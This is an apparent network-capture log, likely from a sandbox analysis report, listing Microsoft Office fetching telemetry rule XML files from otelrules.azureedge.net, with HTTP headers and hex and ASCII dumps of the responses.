                                                                                                                                                                            2024-10-28 18:12:41 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            125192.168.2.44987913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:41 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                            x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-r1755647c665dwkwce4e7gadz00000000670000000008ehw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            126192.168.2.44987713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:41 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                            x-ms-request-id: 8055f236-801e-0083-4e87-28f0ae000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-r1755647c66hlhp26bqv22ant400000005m000000000543f
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            127192.168.2.44988013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:41 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                            x-ms-request-id: 84f9cde7-901e-0083-36a3-26bb55000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bblzxqcphe71tp4qw00000000vg000000001evx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            128192.168.2.44988113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:42 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                            x-ms-request-id: 622dd3a6-e01e-0003-140d-260fa8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-17fbfdc98bb5d4fn785en176rg00000005d000000000a9ws
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            129192.168.2.44988413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:42 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                            x-ms-request-id: 92c6748a-601e-0001-5ca3-26faeb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-r1755647c668pfkhys7b5xnv2n00000005zg000000004ubc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            130192.168.2.44988213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:42 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                            x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-17fbfdc98bb2xwflv0w9dps90c000000066000000000cy0n
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            131192.168.2.44988313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:42 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                            x-ms-request-id: 30963bf2-701e-0001-2a98-28b110000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-17fbfdc98bb8mkvjfkt54wa53800000003f00000000004bx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            132192.168.2.44988513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:42 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                            x-ms-request-id: 5278af64-001e-0034-3fad-26dd04000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-17fbfdc98bbsw6nnfh43fuwvyn00000003h0000000006uqg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            133192.168.2.45915213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:43 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:43 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                            x-ms-request-id: c9ef38c2-001e-002b-2fff-2599f2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181243Z-r1755647c66vwt2b5wfzb6a20400000002700000000000tg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
